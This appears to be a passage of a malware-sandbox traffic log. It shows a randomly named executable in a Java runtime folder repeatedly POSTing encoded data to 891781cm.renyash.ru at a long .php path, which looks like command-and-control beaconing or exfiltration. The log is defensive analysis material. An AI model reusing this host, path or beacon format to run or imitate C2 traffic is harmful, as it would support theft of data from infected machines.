                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3282&min_rtt=1931&rtt_var=3428&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=114545&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1f 30 38 38 00 3c 3d 3d 04 2f 3c 20 0c 31 2c 2a 5c 27 1e 0d 03 24 3e 31 1b 2d 28 33 03 3f 15 3f 5a 26 04 29 59 23 1f 0f 01 31 26 2e 5d 04 1d 25 59 3f 29 3e 5c 3c 06 39 59 29 0c 02 5d 24 37 20 04 31 24 0e 59 27 3d 25 03 20 32 23 1e 33 0a 30 52 3c 07 0e 03 33 2e 26 50 21 3a 2e 57 0d 12 22 51 24 3d 3d 53 29 0f 28 54 22 12 30 0d 27 2f 24 0e 33 02 30 1d 34 01 2d 0d 29 2c 30 5a 22 27 0b 1d 24 5c 3f 13 22 3a 3d 5d 35 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"088<==/< 1,*\'$>1-(3??Z&)Y#1&.]%Y?)>\<9Y)]$7 1$Y'=% 2#30R<3.&P!:.W"Q$==S)(T"0'/$304-),0Z"'$\?":=]5#"T /T=VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49790 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:46.215948105 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:46.571728945 CET1072OUTData Raw: 50 56 58 56 5a 58 51 5b 55 5a 54 59 51 52 55 5d 58 5d 5c 55 59 56 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXVZXQ[UZTYQRU]X]\UYVRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?*#)%&*X03T.78$3,'8-7(=(R>#^!'^)
Jan 1, 2025 15:02:46.699248075 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:46.870839119 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DSphefX1ChMsQ%2FbC%2B0OVDLvgcxC08lfkxCzH396BMSpqs4vqGdmypp1ffWCabcwowXLPWQWXgVFo01V9wZTjDBjnhY3dHgLeKGONdIRDOBEhUZqMHMpbtqWp25byORCN%2F0FSo9f3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c899a9943d5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5034&min_rtt=2151&rtt_var=6574&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=57888&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49791 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:46.998256922 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:47.353056908 CET1072OUTData Raw: 50 51 58 5d 5f 59 51 5d 55 5a 54 59 51 5c 55 55 58 5a 5c 5e 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQX]_YQ]UZTYQ\UUXZ\^YRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+-Y78:%X*)>'3$*T9 ]',5$</-#+X')#^!'^)
Jan 1, 2025 15:02:47.490968943 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:47.753341913 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uqjJpViOUWUDVTCXnI0BVRwbadmKmptMXwddjztrGOjQJDisW14Tn%2F8%2FlT%2BFBJMpbUm3C3nGfRFJLzpSCtyZyxn4BxxhMcPqhxw5R29gGv2bO871iisYswsqqt53zMx4IFHc5Rx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c8e8dc6420d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=24971&min_rtt=22068&rtt_var=14082&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=32233&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49792 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:47.890340090 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:48.243859053 CET1072OUTData Raw: 50 55 5d 54 5a 57 54 5a 55 5a 54 59 51 5c 55 50 58 5c 5c 5e 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]TZWTZUZTYQ\UPX\\^YSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<4;"%=6*.,$'&U.4(^$"U&</-<_==8U=#^!'^)
Jan 1, 2025 15:02:48.335396051 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:48.590187073 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yHpIx4pBIw79tiudn1aYqW0ZTL1Ixphia9Kk9vtBW1bVledTHhw9egGYafgYRJRdNmiGUmBic9nUZmZzwPZIqVbOg36%2Bj2l423tasGYqJzISsgbC%2BViaxq9PUuhG%2BGdqPIrIHD7H"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c93c95e9e1a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=1971&rtt_var=902&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=556826&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49793 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:48.741611958 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:49.087496042 CET1072OUTData Raw: 50 52 5d 53 5f 59 51 5b 55 5a 54 59 51 53 55 52 58 5d 5c 5f 59 50 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]S_YQ[UZTYQSURX]\_YPR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/=]4892&*+^0$U.$0,.3<,8.#(8V><#^!'^)
Jan 1, 2025 15:02:49.256752968 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:49.520925045 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptZvdwPg8uBkXs%2BMOnPOFZERk4ogwEp96HQIwuAiDaNE47kvvrSs7PFO4k3hywLt%2FBooqviWzmAJTQ3dBVDj%2BQDEV4QtfwReBKdS6Cwj8Ku4o1vQ04HE9Ebeledui8AF1Xmw2BMe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c998f880f7d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3467&min_rtt=1639&rtt_var=4272&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=89746&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49794 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:49.663285017 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:50.009284019 CET1072OUTData Raw: 55 56 58 53 5a 5a 51 54 55 5a 54 59 51 5d 55 54 58 52 5c 55 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXSZZQTUZTYQ]UTXR\UY\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y<?)X48-&"=.Y$-.43$,<,]=- W)#^!'^)?
Jan 1, 2025 15:02:50.135163069 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 15:02:50.383744955 CET  806                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXJcXfxoa0SV%2FP%2BLcBK1KjkyWKIMjYyx4KjQwyZu8b5%2BfodBKeNFooKbERNxazGtf6aI335EETfHt9xBrQoKpz7LPe0X1hZfz9s%2BIZHJxE6ZmcmpPbZZJTfkK5DmBalTr3cz5PbB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c9f0c94f3bb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3157&min_rtt=1561&rtt_var=3778&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=101855&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
54          192.168.2.4  49795        104.21.38.84    80                7448  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 15:02:50.515352011 CET  344                OUT        POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:50.868848085 CET  1072               OUT        Data Raw: 55 51 5d 50 5a 57 51 58 55 5a 54 59 51 5d 55 5d 58 58 5c 5b 59 52 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]PZWQXUZTYQ]U]XX\[YRRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<6 %X1.>)>Z'>U,4/3>Q0<,-'?><T)<#^!'^)?
Jan 1, 2025 15:02:50.959526062 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 15:02:51.126379967 CET  807                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Q97p6AVnVePkeXLtrY9%2B%2BFAm2N3frfGmQrjwYESKJAvnwnzQf6HdqXmwlihj4EPaDPzhyT%2Bb78FV3jBGmBofNoNjZvaJuR2NogQvWXREwezD8u4EmCF18TvrA8%2FtjXFJ5VfwQWU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ca43b1a4321-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2194&min_rtt=2062&rtt_var=1039&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=467200&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
55          192.168.2.4  49796        104.21.38.84    80                7448  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 15:02:51.246283054 CET  344                OUT        POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:51.603097916 CET  1072               OUT        Data Raw: 55 5e 58 55 5a 5f 51 58 55 5a 54 59 51 5c 55 5c 58 58 5c 54 59 56 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^XUZ_QXUZTYQ\U\XX\TYVR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<<!\#]%Z&6)X0$%-$<%<)$?3^,>7<-8W)<#^!'^)
Jan 1, 2025 15:02:51.717892885 CET  25                 IN         HTTP/1.1 100 Continue


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
56          192.168.2.4  49797        104.21.38.84    80                7448  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 15:02:51.844161987 CET  344                OUT        POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1756
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:52.196845055 CET  1756               OUT        Data Raw: 55 55 5d 56 5a 57 51 5f 55 5a 54 59 51 5b 55 5d 58 5e 5c 59 59 55 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]VZWQ_UZTYQ[U]X^\YYURY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X<,=[4;-^1.)[*.[$4Q.$4_3.V'#^;?*#^!'^)
Jan 1, 2025 15:02:52.316122055 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 15:02:52.600591898 CET  956                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLkubZT1uAFj1VOVVomcLAEIHhbBpcKplHwCc7NNXzL8cEVIMC3I%2Fh4q4abnPnXoab8BSJ8xfqCBnba3N5OfPGhiPjulRQJYTNmdFXsffsey%2B%2B6DNuuXzoiw5lubmZq%2FOtjLPlrp"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cacaf26439f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8091&min_rtt=1755&rtt_var=13330&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2100&delivery_rate=27839&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 56 27 2b 05 14 3f 3e 2d 04 3b 3c 37 56 32 3f 0c 5c 24 23 24 58 26 2e 18 04 2d 38 3c 5c 3f 15 2f 10 32 04 29 59 34 32 3e 5a 31 0c 2e 5d 04 1d 25 10 3e 04 04 5f 3c 3f 31 5f 3e 1c 01 04 24 19 05 11 25 1d 30 5b 24 03 21 00 22 31 3b 54 24 23 3b 0b 28 5f 33 58 33 03 32 51 34 3a 2e 57 0d 12 22 50 32 00 36 0b 29 31 2c 56 35 2f 27 1c 24 2f 01 1e 30 3c 3c 1f 23 5e 21 0a 2a 59 2f 00 23 34 21 54 33 03 2c 03 35 00 32 00 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"V'+?>-;<7V2?\$#$X&.-8<\?/2)Y42>Z1.]%>_<?1_>$%0[$!"1;T$#;(_3X32Q4:.W"P26)1,V5/'$/0<<#^!*Y/#4!T3,526"T /T=VO0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
57          192.168.2.4  49798        104.21.38.84    80                7448  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 15:02:51.996642113 CET  344                OUT        POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:52.353030920 CET  1072               OUT        Data Raw: 50 51 58 56 5a 5a 51 5c 55 5a 54 59 51 58 55 5d 58 5f 5c 5c 59 5c 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXVZZQ\UZTYQXU]X_\\Y\RS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?<2#;!Y$=)]=.X&$%.B#3?)0/X/- +)#^!'^)+
Jan 1, 2025 15:02:52.466875076 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 15:02:52.727421045 CET  800                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxFd88o1c63Q%2BpibvyrUYUTwBOvXoxUEjOq0NuGjYqdDlXYsHpgG11HTNlIT39gbQCKw7XSYPp7OhjQyprRnuIxoiEQefadGFR0Zj40K6pL9hy9hg7iIy5NGXMXBKFhXSoUwk4U8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cad9fb072ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
